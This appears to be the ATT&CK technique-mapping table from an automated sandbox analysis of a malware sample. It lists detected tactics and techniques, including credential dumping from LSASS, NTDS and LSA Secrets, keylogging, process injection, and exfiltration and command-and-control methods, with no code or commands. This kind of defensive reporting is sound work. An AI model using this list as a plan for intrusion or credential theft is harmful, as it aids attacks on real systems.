Initial Access: Valid Accounts, Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media
Execution: Command and Scripting Interpreter (2), Native API (1), At (Linux), At (Windows), Cron, Launchd
Persistence: DLL Side-Loading (1), Application Shimming (1), Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common
Privilege Escalation: Process Injection (111), DLL Side-Loading (1), Application Shimming (1), Logon Script (Mac), Network Logon Script, Rc.common
Defense Evasion: Virtualization/Sandbox Evasion (1), Process Injection (111), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Regsvr32 (1), DLL Side-Loading (1)
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials
Discovery: System Time Discovery (1), Security Software Discovery (2), Virtualization/Sandbox Evasion (1), Remote System Discovery (1), File and Directory Discovery (1), System Information Discovery (23)
Lateral Movement: Remote Services, Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC
Collection: Archive Collected Data (1), Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel
Command and Control: Encrypted Channel (11), Ingress Tool Transfer (3), Non-Application Layer Protocol (3), Application Layer Protocol (4), Fallback Channels, Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features

Behavior Graph
